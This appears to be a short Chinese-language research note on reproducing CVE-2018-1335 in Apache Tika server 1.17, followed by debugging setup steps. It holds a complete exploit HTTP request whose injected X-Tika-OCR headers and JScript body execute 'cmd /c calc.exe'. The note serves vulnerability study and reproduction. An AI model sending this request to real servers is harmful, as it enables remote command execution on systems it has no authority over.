PoC:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335
PUT /meta HTTP/1.1
Host: cqq.com:9998
Connection: close
User-Agent: python-requests/2.19.1
X-Tika-OCRTesseractPath: "cscript"
Content-type: image/jp2
Expect: 100-continue
X-Tika-OCRLanguage: //E:Jscript
Content-Length: 98
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c calc.exe');
分析:https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
只在Windows上复现。
< 1.18 server
下载:https://archive.apache.org/dist/tika/tika-server-1.17.jar
启动:
java -jar tika-server-1.17.jar
调试
照例按照之前远程调试的经验,设置参数启动tika-server:
$ java -Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346 -jar ./target/tika-server-1.17.jar -h 192.168.170.139
如图,当Idea中点击调试按钮之后就会连接到该端口。
然后在intelli Idea引入server目录,以及parser目录(因为会用到),不然调试的时候跟不到那个源码部分。
然后在右下角允许maven同步,需要下载一些依赖包,方便调试源码。